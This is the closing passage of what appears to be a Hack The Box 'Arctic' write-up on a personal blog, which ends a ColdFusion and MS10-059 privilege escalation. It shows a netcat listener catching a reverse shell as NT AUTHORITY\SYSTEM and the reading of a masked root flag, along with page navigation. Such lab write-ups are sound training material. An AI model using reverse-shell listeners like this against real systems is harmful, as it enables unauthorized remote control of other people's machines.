</pre></table></code></div></div><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre><span class="nv">$ </span>rlwrap nc <span class="nt">-lvnp</span> 1337  
listening on <span class="o">[</span>any] 1337 ...
connect to <span class="o">[</span>10.10.XX.XX] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.11] 49831
Microsoft Windows <span class="o">[</span>Version 6.1.7600]
Copyright <span class="o">(</span>c<span class="o">)</span> 2009 Microsoft Corporation.  All rights reserved.

C:<span class="se">\t</span>mp&gt; <span class="nb">whoami
whoami
</span>nt authority<span class="se">\s</span>ystem
</pre></table></code></div></div><h1 id="roottxt">root.txt</h1><p>The root flag is in <code class="language-plaintext highlighter-rouge">Administrator</code>’s Desktop.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>C:\tmp&gt; type C:\Users\Administrator\Desktop\root.txt
ce65XXXXXXXXXXXXXXXXXXXXXXXXXXXX
</pre></table></code></div></div><h3 id="rooted--thank-you-for-reading-and-look-forward-for-more-writeups-and-articles-">Rooted ! Thank you for reading and look forward for more writeups and articles !</h3></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>hackthebox</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/windows/" class="post-tag no-text-decoration" >windows</a> <a href="/tags/coldfusion/" class="post-tag no-text-decoration" >coldfusion</a> <a href="/tags/ms10-059/" class="post-tag no-text-decoration" >ms10-059</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hack The Box - Arctic (Without Metasploit) - rizemon's blog&url=https://rizemon.github.io/posts/arctic-htb/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hack The Box - Arctic (Without Metasploit) - rizemon's blog&u=https://rizemon.github.io/posts/arctic-htb/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Hack The Box - Arctic (Without Metasploit) - rizemon's blog&url=https://rizemon.github.io/posts/arctic-htb/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/htbcybersanta-ctf/">HackTheBox CTF - Cyber Santa</a><li><a href="/posts/ticket1part2-thm/">TryHackMe - Pre Security Learning Path (Part 2) [PARTICIPATE IN THE GIVEAWAY!]</a><li><a href="/posts/oscp-reflection/">Post-OSCP Writeup</a><li><a href="/posts/granny-htb/">Hack The Box - Granny (Without Metasploit)</a><li><a href="/posts/cronos-htb/">Hack The Box - Cronos (Without Metasploit)</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/php/">php</a> <a class="post-tag" href="/tags/ssh/">ssh</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/juicypotato/">juicypotato</a> <a class="post-tag" href="/tags/rsa/">rsa</a> <a class="post-tag" href="/tags/smb/">smb</a> <a class="post-tag" href="/tags/sudo/">sudo</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/bastion-htb/"><div class="card-body"> <span class="timeago small" > Sep 7, 2019 <i class="unloaded">2019-09-07T23:11:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box - Bastion</h3><div class="text-muted small"><p> I found this machine a little hard at first as this was my first Windows machine and I wasn’t adept at exploiting Windows. After reading various write ups and guides online, I was able to root this...</p></div></div></a></div><div class="card"> <a href="/posts/heist-htb/"><div class="card-body"> <span class="timeago small" > Dec 2, 2019 <i class="unloaded">2019-12-02T00:27:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box - Heist</h3><div class="text-muted small"><p> Configuration The operating system that I will be using to tackle this machine is a Kali Linux VM. Always remember to map a domain name to the machine’s IP address to ease your rooting ! $ ech...</p></div></div></a></div><div class="card"> <a href="/posts/json-htb/"><div class="card-body"> <span class="timeago small" > Feb 16, 2020 <i class="unloaded">2020-02-16T01:41:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box - Json</h3><div class="text-muted small"><p> Configuration The operating systems that I will be using to tackle this machine is a Kali Linux VM. What I learnt from other writeups is that it was a good habit to map a domain name to the mac...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/granny-htb/" class="btn btn-outline-primary"><p>Hack The Box - Granny (Without Metasploit)</p></a> <a href="/posts/grandpa-htb/" class="btn btn-outline-primary"><p>Hack The Box - Grandpa (Without Metasploit)</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/rizemon">rizemon</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/php/">php</a> <a class="post-tag" href="/tags/ssh/">ssh</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/juicypotato/">juicypotato</a> <a class="post-tag" href="/tags/rsa/">rsa</a> <a class="post-tag" href="/tags/smb/">smb</a> <a class="post-tag" href="/tags/sudo/">sudo</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://rizemon.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
